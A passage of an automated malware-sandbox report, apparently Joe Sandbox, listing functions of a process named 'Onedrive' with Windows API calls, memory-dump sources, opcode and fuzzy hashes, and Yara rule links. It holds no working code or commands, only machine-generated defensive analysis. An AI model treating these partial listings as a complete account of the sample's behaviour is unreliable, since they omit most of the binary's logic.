                                                    • Instruction Fuzzy Hash: ADE11C36A18B8586D774CB1AE491B9EB7A0F788740F114535EBDD87BA9EF7CD4808B00
                                                    Function 00007FF63EA1E048 Relevance: 11.4, APIs: 9, Instructions: 129memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E0D0
                                                    • HeapAlloc.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E0E4
                                                    • memmove.MSVCRT(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E112
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E13B
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E150
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E186
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E19A
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E1C7
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E1DB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
                                                    • Instruction ID: 868a7e2e9c2e4d80210ba4b256fbb0ca34d555e0485b5da6b2b23e3431fc1e81
                                                    • Opcode Fuzzy Hash: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
                                                    • Instruction Fuzzy Hash: 51419131B08A8287E6149F93A50017AAAA1FFB9BC5F09C038EE4E97745DF3CE4499311
                                                    Function 00007FF63EA17010 Relevance: 10.6, APIs: 7, Instructions: 117memorythreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA19CD8: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A00D
                                                      • Part of subcall function 00007FF63EA19CD8: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A022
                                                      • Part of subcall function 00007FF63EA19CD8: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A036
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA1714D
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA1715E
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA17173
                                                    • PostThreadMessageW.USER32 ref: 00007FF63EA17194
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$Process$LocalMessagePostStringThread
                                                    • String ID:
                                                    • API String ID: 4078191539-0
                                                    • Opcode ID: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
                                                    • Instruction ID: 84b58b0db9fd0bfd2ca4d95f1b3bf12b5c803fd1cc906ff2d5af91bff7750a80
                                                    • Opcode Fuzzy Hash: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
                                                    • Instruction Fuzzy Hash: 0D41E421B0CB4686EB109BA1A400179B7A1FFB9B85F069135FE4EC7741DE3CE449A360
                                                    Function 00007FFDF3AD2830 Relevance: 10.6, APIs: 7, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
                                                    • Instruction ID: 68da518916d8283abba1dd30c3caf5de3a523e2a3a43146bd6f9a8736f810aac
                                                    • Opcode Fuzzy Hash: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
                                                    • Instruction Fuzzy Hash: C6411432608B8586E7609B15F4643AAB7A5FB89740F51013ADADE5BBACEF3CC544CB00
                                                    Function 00007FF63EA1D98C Relevance: 10.2, APIs: 8, Instructions: 190memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
                                                    • Instruction ID: d6babe01613a9aeac76784d7149ce03222e652f2683dfc3c996d5e6471051f66
                                                    • Opcode Fuzzy Hash: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
                                                    • Instruction Fuzzy Hash: 6F719132B08652CAEB049BA595442BD27E0FB68BC5F454539FE0ED3B98DF38D849D320
                                                    Function 00007FF63EA1BF50 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindResourceExW.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BF89
                                                    • LoadResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFA6
                                                    • LockResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFBA
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C026
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C03C
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C052
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastResource$FindLoadLock
                                                    • String ID:
                                                    • API String ID: 2613642035-0
                                                    • Opcode ID: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                                    • Instruction ID: 9a37eb953cf037b900791e8bf294d6a229b4087d56cdf6d137bd7b881e02f7c7
                                                    • Opcode Fuzzy Hash: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                                    • Instruction Fuzzy Hash: A931A372B05B9186EB144F96A441239B7E0FFA9F81B059138EA4ED7350DF3CE448A720
                                                    Function 00007FFDF3AEC6DE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: HeapValidate__vcrt_lock
                                                    • String ID: Cycle in block list detected while processing block located at 0x%p.$Heap validation failed.$I'
                                                    • API String ID: 504802999-730636035
                                                    • Opcode ID: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                                    • Instruction ID: 389196b3bd0f5be1cc9df4daade8e11651602419b1c8afe1bc17eb8cb017e275
                                                    • Opcode Fuzzy Hash: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                                    • Instruction Fuzzy Hash: 2531413671CB8186E7608B2AE0A4B2A77A0F785780F515435E79D57BACDF3CD4808B00
                                                    Function 00007FFDF3AEDC60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextCurrentDebuggerPresent__crt
                                                    • String ID: [!] 0x%0.8X Failed With Error: 0x%0.8X
                                                    • API String ID: 3997116924-2773923016
                                                    • Opcode ID: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                                    • Instruction ID: f121cb623c77db147d9a9a129f93102e1b6e008e2a7bdf7ffa6cde1ef9c59b0f
                                                    • Opcode Fuzzy Hash: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                                    • Instruction Fuzzy Hash: 4031E432609BC18AE770DB15E8647ABB7A0FB84355F410636D6AD57B98EF3CD5848F00
                                                    Function 000001729DD358AF Relevance: 8.4, Strings: 6, Instructions: 942COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $#$8$8$d
                                                    • API String ID: 0-424029278
                                                    • Opcode ID: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                                    • Instruction ID: 5fa72bfffb3381f6c619bcee79617ea9d7e1fab9799288ab428eeaafedae567e
                                                    • Opcode Fuzzy Hash: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                                    • Instruction Fuzzy Hash: AA72AC3151CB588FE7A8DF08C445BEAF7E1FB98308F58466ED18DC7291DB3495829B82
                                                    Function 00007FFDF3AD3190 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD319B
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31A6
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31AC
                                                    • TerminateProcess.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31BA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                    • String ID:
                                                    • API String ID: 3231755760-0
                                                    • Opcode ID: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                                    • Instruction ID: 14f6a989958b5f38a38ff99429e10cba07f2feb00dd05ac228fd602a4134fdf1
                                                    • Opcode Fuzzy Hash: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                                    • Instruction Fuzzy Hash: 8AD01220F18642D2D744BF31E8794292220BB85B01F914034CA9F19268CE3CD4598600
                                                    Function 000001729DD3764F Relevance: 5.3, Strings: 4, Instructions: 322COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $($6$BM
                                                    • API String ID: 0-1480521668
                                                    • Opcode ID: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                                    • Instruction ID: 6a61af767dc4f675a64328f039f6efdf9f9f6b8bd7658829ca3a56b8c2857029
                                                    • Opcode Fuzzy Hash: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                                    • Instruction Fuzzy Hash: 31A16D3521CB588FE764DF28C449BAAB7E1FB99304F050569E58AC73A0EF74D841CB92
                                                    Function 00007FFDF3B023A0 Relevance: 4.3, Strings: 3, Instructions: 551COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                                                    • API String ID: 0-226933
                                                    • Opcode ID: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                                    • Instruction ID: 2f3b5515d9232c5b6062130a11290bc4dac3471dddd0f4293fceea7c7729f05d
                                                    • Opcode Fuzzy Hash: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                                    • Instruction Fuzzy Hash: 0052D7767096808BD764CF19E4A0B6AB7A1F7C8744F504125EA9ECBB98DB3DE844CF00
                                                    Function 00007FF63EA157D0 Relevance: 3.9, APIs: 3, Instructions: 136memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcessmemmove
                                                    • String ID:
                                                    • API String ID: 459441494-0
                                                    • Opcode ID: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                                    • Instruction ID: 94a1305c05f17b2361b086ef79f7c8edc479b4839f7ae91a605fe9b23e616df0
                                                    • Opcode Fuzzy Hash: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                                    • Instruction Fuzzy Hash: AE41E723F0865686EE24ABA1A40007D6692BFB4B94F594135FE5DC7381DE3CE40EE260
                                                    Function 000001729DD2876F Relevance: 1.7, Strings: 1, Instructions: 467COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                                    • Instruction ID: 3d507df7442c74f1480d8c553e0eac39388f826af4d1746cbc277d4d0bc1f78d
                                                    • Opcode Fuzzy Hash: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                                    • Instruction Fuzzy Hash: 98F166313189188FE784EB29C495BA673F2FB8C305F444468E68DC7296DF34E982DB52
                                                    Function 00007FFDF3AEB9F0 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                                    • Instruction ID: 2961f13e2ea21df349f8953ead9d99b42cd47b2ce34868da0d3e8bfe423930b0
                                                    • Opcode Fuzzy Hash: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                                    • Instruction Fuzzy Hash: F7310D3661DA848ACBA0CB16E49476ABBA0F788744F505135EADE87B98DF3CD1508F00
                                                    Function 00007FFDF3AD2B00 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-3993045852
                                                    • Opcode ID: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                                    • Instruction ID: 313571380487f563ab40b4adaf27eba3168f5673a7bea3fc6dc48dcf8b02a7a3
                                                    • Opcode Fuzzy Hash: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                                    • Instruction Fuzzy Hash: 49D15D72B187018AE755CF29E862726B6E0F788354F454635EABDDB7D8DA3CE440CB04
                                                    Function 00007FF63EA1EBD0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF63EA1EBDB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                                    • Instruction ID: 7c2e9f98e99982aad0313e2347af64ad475b207f353cad965ec530896de9b552
                                                    • Opcode Fuzzy Hash: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
                                                    • Instruction Fuzzy Hash: 16B01224F29402C1D608AB62DC9606112B17F7C300FC04831D00FC0720DE1CD59FD710
                                                    Function 00007FFDF3AD1960 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: cAAFvCF*&
                                                    • API String ID: 0-870564915
                                                    • Opcode ID: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                                    • Instruction ID: c4caa592676ba76de069cbe01b6c1e830715df1145796689edea89b15970725b
                                                    • Opcode Fuzzy Hash: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
                                                    • Instruction Fuzzy Hash: 58719036714A0287DB898F29E971A7837A1F744780B45923AEEAEDB3D4DB3CD841C740
                                                    Function 000001729DD2A71A Relevance: .8, Instructions: 821COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
                                                    • Instruction ID: eaddcb5e27eb18dbc2859a522ec0d9ecf3f38d2fb52ebf4f7077b6b93efbc25c
                                                    • Opcode Fuzzy Hash: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
